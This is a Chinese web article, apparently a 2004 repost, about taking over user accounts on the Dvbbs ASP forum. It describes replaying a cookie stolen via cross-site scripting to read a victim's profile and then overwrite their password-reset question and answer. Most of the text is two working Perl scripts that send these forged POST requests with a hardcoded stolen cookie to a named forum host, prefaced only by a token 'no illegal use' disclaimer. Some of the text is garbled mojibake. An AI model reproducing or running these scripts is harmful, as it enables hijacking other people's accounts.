首页 电脑 电脑学堂 查看内容

突破动网先锋asp论坛的密码加密限制

2004-9-29 20:05 923 0

摘要: 对动网先锋asp论坛的安全性分析----跨站脚本攻击应用(shocknet)的文章大家不知道看过没有,动网论坛密码和提示问题答案是md5加密过的,拿到cookie也没什么价值。我们可以换一种思路,拿到...
关键词: Content host target Socket hiallone print cgi req http problems

对动网先锋asp论坛的安全性分析----跨站脚本攻击应用(shocknet)的文章大家不知道看过没有,动网论坛密码和提示问题答案是md5加密过的,拿到cookie也没什么价值。我们可以换一种思路,拿到cookie后,通过发送一个请求取的用户的相关资料,然后再发送个请求修改用户提示问题以及答案。声明:以下的两个脚本尽供参考,请勿用作非法用途,否则一切后果自负!hiallone是以诙??厶匙⒉岬挠美床馐缘挠没В?蠹铱梢钥纯囱菔拘Ч?br> http://enter.3322.net/cgi-bin/dongw.cgi http://enter.3322.net/cgi-bin/dongw1.cgi#!/usr/bin/perl#取得用户资料#http://enter.3322.net/cgi-bin/dongw.cgi use Socket;$host = "bbs.aspsky.net";$port = 80;$str = "";$len =length($str);$req = "POST /MYMODIFY.ASP?name=hiallone HTTP/1.1\r\n"."Host: $host\r\n"."Accept: */*\r\n"."Cookie: aspsky=password=965eb72c92a549dd&usercookies=0&username=hiallone&userclass=%C2%DB%CC%B3%D3%CE%C3%F1&upNum=1;\r\n"."Content-Type: application/x-www-form-urlencoded\r\n"."Content-Length: $len\n\n"."$str\n\n";@re =sendraw($req);print "Content-type: text/html\n\n";print "@re";sub sendraw { my ($req) = @_; my $target; $target = inet_aton($host) || die("inet_aton problems"); socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n"); if(connect(S,pack "SnA4x8",2,$port,$target)){ select(S); $| = 1; print $req; my @res = ; select(STDOUT);close(S); return @res;}else { die("Can't connect...\n"); }} #!/usr/bin/perl#修改提示问题以及答案,在这里我们可以修改quesion=whoami21&answer=superdao#那么你可以去改他的密码了,呵呵!http://enter.3322.net/cgi-bin/dongw1.cgi use Socket;$host = "bbs.aspsky.net";$port = 80;$str = 'Sex=1&psw=965eb72c92a549dd&quesion=whoami21&answer=superdao&oldanswer=076d0cca420653d4&Email=o00o@800e.net&birthyear=&birthmonth=&birthday=&face=Pic%2FImage1.gif&myface=Pic%2FImage1.gif&width=22&height=22&URL=&groupname=%CE%DE%C3%C5%CE%DE%C5%C9&OICQ=&ICQ=&msn=&showRe=1&Signature=&usercookies=0&Submit=%B8%FC+%D0%C2';$len =length($str);$req = "POST /mymodify.asp?action=updat&username=hiallone HTTP/1.1\r\n"."Host: $host\r\n"."Accept-Language: zh-cn\r\n"."Content-Type: application/x-www-form-urlencoded\r\n"."Accept-Encoding: gzip, deflate\r\n"."User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)\r\n"."Cookie: aspsky=upNum=1&password=965eb72c92a549dd&userclass=%C2%DB%CC%B3%D3%CE%C3%F1&username=hiallone&usercookies=0\r\n"."Content-Length: $len\r\n"."Connection: Keep-Alive\n\n"."$str\n\n";@re =sendraw($req);print "Content-type: text/html\n\n";print "@re";sub sendraw { my ($req) = @_; my $target; $target = inet_aton($host) || die("inet_aton problems"); socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n"); if(connect(S,pack "SnA4x8",2,$port,$target)){ select(S); $| = 1; print $req; my @res = ; select(STDOUT);close(S); return @res;}else { die("Can't connect...\n"); }}
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部